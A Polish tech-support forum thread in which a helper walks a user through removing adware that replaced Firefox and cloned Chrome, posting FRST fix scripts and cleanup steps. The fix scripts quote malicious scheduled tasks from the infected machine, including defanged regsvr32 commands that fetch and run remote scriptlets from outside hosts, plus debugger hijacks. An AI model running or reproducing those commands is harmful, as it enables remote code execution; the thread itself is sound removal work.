oruj11 Opublikowano 11 Maja 2017 Zgłoś Udostępnij Opublikowano 11 Maja 2017 Witam, jestem tu nowy więc jeżeli źle założyłem nowy temat to przepraszam, Od jakiegoś czasu (około 3 tygodni ) instalują się same programy chrome i firefox, próbowałem usunąć to "adwcleaner_6.046" ale bez skutku co kilka dni instalowało się znowu pod inna nazwa folderu (Zoohair, a teraz Bagsarah) a teraz dodatkowo doszło jakaś gra? "Bigfarm" i "big_bang_empire" . Nie za bardzo wiem o co chodzi z tymi logami, ale zamieszczam jakieś pliki z programu FRST i adwcleaner. Dodam że ja korzystam z opery, żona (prawdopodobnie to ona zainstalowała jakiś program z którym dostałem w pakiecie wirusa) z chrome. Fire foxa nie używałem nigdy. Bardzo proszę o pomoc. Addition.txt AdwCleanerS23.txt FRST.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 12 Maja 2017 Zgłoś Udostępnij Opublikowano 12 Maja 2017 Dziś odpowiem w temacie, ale proszę proszę jeszcze o obowiązkowy raport GMER. Odnośnik do komentarza
oruj11 Opublikowano 12 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 12 Maja 2017 Przepraszam, że tak późno ale dopiero z pracy dotarłem. Dorzucam logi z GMER. Jeżeli coś jeszcze to proszę o info, zależy mi na pomocy. GMER.txt Odnośnik do komentarza
Miszel03 Opublikowano 12 Maja 2017 Zgłoś Udostępnij Opublikowano 12 Maja 2017 System został zainfekowany poprzez adware. Przeglądarka Mozilla FireFox została całkowicie podstawiona (= brak oryginalnej instalacji), zaś do Google Chrome wkomponował (= widoczna oryginalna instalacja) się fałszywy klon co po skutkowało tym, że w cały ekran jest zaspamowany reklamami i tymi podobnymi rzeczami. P.S: SpyHunter - kasuję, to wątpliwy twór, raczej omijać. Po za tym czy to jest jakaś epidemia pośród użytkowników Windows 7 polegająca na baku antywirusa? Przejrzyj - KLIK. Portale z oprogramowaniem / Instalatory - na co uważać 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1970287958-98934462-1251740563-1000\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Bagsarah RemoveDirectory: C:\Users\Jurek\AppData\Local\Bagsarah Task: {277EC516-72C2-473C-BDC0-BE7E8AAF98F3} - \NCH Software\DebutDowngrade -> Brak pliku Task: {7CA6B8B8-45B7-4C10-8B13-A5D84209BA20} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1XMWF5FTwdOWq3NWIcMWU5NWUcRWFxN8QWN8F1RTq2NH== scrobj.dll Task: {A294569E-C5C8-4F31-AF9D-6BE59D0B0586} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1XMWF5FTwdOWq3NWIcMWU5NWUcRWFxN8QWN8F1RTq2NH== scrobj.dll C:\Users\Jurek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk ShortcutWithArgument: C:\Users\Jurek\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\Jurek\Desktop\big_bang_empire.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 ShortcutWithArgument: C:\Users\Jurek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\Jurek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 AlternateDataStreams: C:\ProgramData\TEMP:65D36A19 [129] MSCONFIG\startupreg: background_fault => "C:\Users\Jurek\AppData\Local\background_fault\aswRD.exe" "C:\Users\Jurek\AppData\Local\background_fault\bf.dll",background_fault_collector -4EAE-976C-719B5E4B0958}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe FirewallRules: [{7B690986-B997-4851-8E65-9337921C6D3F}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{C902E7C3-6CD9-47B6-944A-16CD0E73A8DB}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe ShellIconOverlayIdentifiers: [GGDriveOverlay1] -> {E68D0A50-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay2] -> {E68D0A51-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay3] -> {E68D0A52-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay4] -> {E68D0A53-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-1970287958-98934462-1251740563-1000\Software\Microsoft\Internet Explorer\Main,Start Page = R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [103064 2017-05-11] () R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [brak podpisu cyfrowego] R2 WinInstallSvc; C:\ProgramData\Microsoft\AppV\Setup\Integrator.dll [105984 2017-05-08] () [brak podpisu cyfrowego] S3 MBAMWebProtection; \??\C:\Windows\system32\drivers\mwac.sys [X] S3 MSICDSetup; \??\D:\CDriver64.sys [X] S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] RemoveDirectory: C:\Users\Jurek\AppData\Roaming\Firefox RemoveDirectory: C:\Users\Jurek\AppData\Local\Firefox RemoveDirectory: C:\Program Files (x86)\Firefox 2017-05-03 14:50 - 2017-05-03 15:01 - 70702111 _____ C:\Users\Jurek\Desktop\SpyHunter 4.21.10.4585 Portable.rar 2017-05-11 13:02 - 2017-05-11 13:02 - 00001978 _____ C:\Users\Jurek\Desktop\big_bang_empire.lnk 2017-05-11 13:02 - 2017-05-11 13:02 - 00001952 _____ C:\Users\Jurek\Desktop\BigFarm.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Stefan\AppData\Local\Mozilla C:\Users\Stefan\AppData\Roaming\Mozilla C:\Users\Stefan\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikacje infekcji. 3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). bagsarah;zoohair;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
oruj11 Opublikowano 12 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 12 Maja 2017 Zrobione , chyba nic nie pominąłem... Fixlog.txt SearchReg.txt AdwCleanerS24.txt Addition.txt FRST.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 13 Maja 2017 Zgłoś Udostępnij Opublikowano 13 Maja 2017 Jest już nawet w porządku, drobne poprawki oraz skan antywirusowy. Zbliżamy się do finalizacji tematu. Pewnie zauważyłeś, że nie ma skrótów do przeglądarek, ale spokojnie to standardowa procedura ich resetu, na koniec utworzysz sobie nowe. 1. Zagrożenia wykryte przez AdwCleaner daj do kasacji (za pomocą opcji Oczyść). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Bagsarah DeleteKey: HKEY_USERS\S-1-5-21-1970287958-98934462-1251740563-1000\Software\Bagsarah DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Firefox DeleteKey: HKEY_USERS\S-1-5-21-1970287958-98934462-1251740563-1000\Software\Firefox BootExecute: autocheck autochk * sh4native Sh4Removal U0 Partizan; system32\drivers\Partizan.sys [X] AlternateDataStreams: C:\Users\Public\DRM:احتضان [48] FirewallRules: [{9F752293-5243-4EAE-976C-719B5E4B0958}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 4. Dostarcz sam plik Fixlog, już bez nowych logów FRST. Podsumuj obecny stan systemu. Odnośnik do komentarza
oruj11 Opublikowano 13 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 13 Maja 2017 Pliki w załączeniu. Puki co wszystko wydaje się być ok. Ale ten Malwarebytes wykrył niby sporo rzeczy jeszcze... Fixlog.txt scan malwa.txt Odnośnik do komentarza
Miszel03 Opublikowano 13 Maja 2017 Zgłoś Udostępnij Opublikowano 13 Maja 2017 MBAM nie wykrył nic ciekawego, tylko szczątki. Wszystko co wykrył daj do kasacji (wraz z Mobogenie bo to adware - ważne pliki sobie zostaw). Jeśli nadal będzie OK to będziemy kończyć. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows. Odnośnik do komentarza
oruj11 Opublikowano 13 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 13 Maja 2017 Ok, mam nadzieje, że będzie spoko. Za jakiś czas się odezwę i potwierdzę. Wielkie dzięki za pomoc , normalnie odzyskuje się w wiarę w ludzi. Pozdrawiam wszystkich. Odnośnik do komentarza
Miszel03 Opublikowano 13 Maja 2017 Zgłoś Udostępnij Opublikowano 13 Maja 2017 OK, rozumiem Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się